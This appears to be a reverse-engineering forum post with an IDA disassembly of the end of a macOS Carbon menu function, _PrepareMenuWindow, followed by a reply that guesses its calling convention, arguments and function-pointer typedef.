__text:00063A90 mov dword ptr [esp+4], 7
__text:00063A98 mov eax, [ebp+var_3C]
__text:00063A9B mov [esp], eax
__text:00063A9E call __Z12_CallMenuDefP8MenuDatasP4Rect5PointPs ; _CallMenuDef(MenuData *,short,Rect *,Point,short *)
__text:00063AA3 cmp [ebp+var_1A], 7473h
__text:00063AA9 jz short loc_63ADC
__text:00063AAB add word ptr [ebp+var_2C], 3
__text:00063AB0 mov dword ptr [esp+8], 0FFFFFFFCh
__text:00063AB8 mov dword ptr [esp+4], 0FFFFFFFCh
__text:00063AC0 mov ecx, [ebp+var_44]
__text:00063AC3 mov [esp], ecx
__text:00063AC6 call _InsetRect
__text:00063ACB mov eax, [ebp+var_44]
__text:00063ACE mov [esp+4], eax
__text:00063AD2 mov [esp], esi
__text:00063AD5 call _RectRgn
__text:00063ADA jmp short loc_63B23
__text:00063ADC ; ---------------------------------------------------------------------------
__text:00063ADC
__text:00063ADC loc_63ADC: ; CODE XREF: _PrepareMenuWindow+102j
__text:00063ADC lea eax, [ebp+var_24]
__text:00063ADF mov [esp+8], eax
__text:00063AE3 lea eax, [ebp+var_20]
__text:00063AE6 mov [esp+4], eax
__text:00063AEA mov [esp], edi
__text:00063AED call __GetMenuCallout
__text:00063AF2 movsx eax, [ebp+var_24]
__text:00063AF6 mov [esp+10h], eax
__text:00063AFA mov eax, [ebp+var_20]
__text:00063AFD mov [esp+0Ch], eax
__text:00063B01 mov [esp+8], esi
__text:00063B05 mov [esp+4], ebx
__text:00063B09 mov ecx, [ebp+var_44]
__text:00063B0C mov [esp], ecx
__text:00063B0F call __GetThemeMenuBackgroundRegionWithCallout
__text:00063B14 mov eax, [ebp+var_44]
__text:00063B17 mov [esp+4], eax
__text:00063B1B mov [esp], esi
__text:00063B1E call _GetRegionBounds
__text:00063B23
__text:00063B23 loc_63B23: ; CODE XREF: _PrepareMenuWindow+BBj
__text:00063B23 ; _PrepareMenuWindow+133j
__text:00063B23 mov [esp+0Ch], esi
__text:00063B27 mov ecx, [ebp+var_44]
__text:00063B2A mov [esp+8], ecx
__text:00063B2E mov [esp+4], ebx
__text:00063B32 mov [esp], edi
__text:00063B35 call __ZL13GetMenuWindowP13OpaqueMenuReftPK4RectP15OpaqueRgnHandle ; GetMenuWindow(OpaqueMenuRef *,ushort,Rect const*,OpaqueRgnHandle *)
__text:00063B3A test eax, eax
__text:00063B3C jz short loc_63BA1
__text:00063B3E mov [esp], eax
__text:00063B41 call _GetWindowPort
__text:00063B46 mov [esp], eax
__text:00063B49 call _SetPortWrapper
__text:00063B4E mov [esp], esi
__text:00063B51 call _SetClipWrapper
__text:00063B56 mov [esp], esi
__text:00063B59 call _DisposeRgn
__text:00063B5E mov eax, [ebp+var_3C]
__text:00063B61 mov eax, [eax+40h]
__text:00063B64 test eax, eax
__text:00063B66 jnz short loc_63BDD
__text:00063B68 mov dword ptr [esp+14h], 0
__text:00063B70 mov dword ptr [esp+10h], 0
__text:00063B78 mov [esp+0Ch], ebx
__text:00063B7C mov ecx, [ebp+arg_4]
__text:00063B7F mov [esp+8], ecx
__text:00063B83 mov eax, [ebp+var_44]
__text:00063B86 mov [esp+4], eax
__text:00063B8A mov [esp], edi
__text:00063B8D call __Z18DrawMenuBackgroundP13OpaqueMenuRefRK4RectS3_thPv ; DrawMenuBackground(OpaqueMenuRef *,Rect const&,Rect const&,ushort,uchar,void *)
__text:00063B92 jmp short loc_63BDD
__text:00063B94 ; ---------------------------------------------------------------------------
__text:00063B94
__text:00063B94 loc_63B94: ; CODE XREF: _PrepareMenuWindow+90j
__text:00063B94 mov ecx, [ebp+arg_0]
__text:00063B97 mov [esp], ecx
__text:00063B9A call _DisposeMenuWindow
__text:00063B9F jmp short loc_63BDD
__text:00063BA1 ; ---------------------------------------------------------------------------
__text:00063BA1
__text:00063BA1 loc_63BA1: ; CODE XREF: _PrepareMenuWindow+195j
__text:00063BA1 mov eax, [ebp+arg_0]
__text:00063BA4 mov [esp], eax
__text:00063BA7 call __Z11FindMBEntryP8MenuData ; FindMBEntry(MenuData *)
__text:00063BAC mov ecx, eax
__text:00063BAE test eax, eax
__text:00063BB0 jz short loc_63BD5
__text:00063BB2 mov word ptr [eax+1Eh], 0
__text:00063BB8 mov word ptr [eax+1Ch], 0
__text:00063BBE mov word ptr [eax+1Ah], 0
__text:00063BC4 mov word ptr [eax+18h], 0
__text:00063BCA mov eax, [eax+18h]
__text:00063BCD mov edx, [ecx+1Ch]
__text:00063BD0 mov [ecx], eax
__text:00063BD2 mov [ecx+4], edx
__text:00063BD5
__text:00063BD5 loc_63BD5: ; CODE XREF: _PrepareMenuWindow+209j
__text:00063BD5 mov [esp], esi
__text:00063BD8 call _DisposeRgn
__text:00063BDD
__text:00063BDD loc_63BDD: ; CODE XREF: _PrepareMenuWindow+AAj
__text:00063BDD ; _PrepareMenuWindow+1BFj ...
__text:00063BDD xor eax, eax
__text:00063BDF add esp, 5Ch
__text:00063BE2 pop ebx
__text:00063BE3 pop esi
__text:00063BE4 pop edi
__text:00063BE5 leave
__text:00063BE6 retn
__text:00063BE6 _PrepareMenuWindow endp

What have you got so far that isn't generated by IDA? (ie: your analysis of the function).
From the looks of it its a __cdecl function that always returns NULL/false/0. It also seems to take 3 arguments(which can be confirmed by looking at what cleanup is by the caller, if there is any).
Arg 0 is a MenuData*, arg 4 seems to be a Rect&(which is secretly just Rect*), arg 8 would be whatever type __AddOpenMenu takes as its fourth argument.
So i'd assume something along the lines of typedef BOOL(__cdecl*)(MenuData*,Rect&,void*)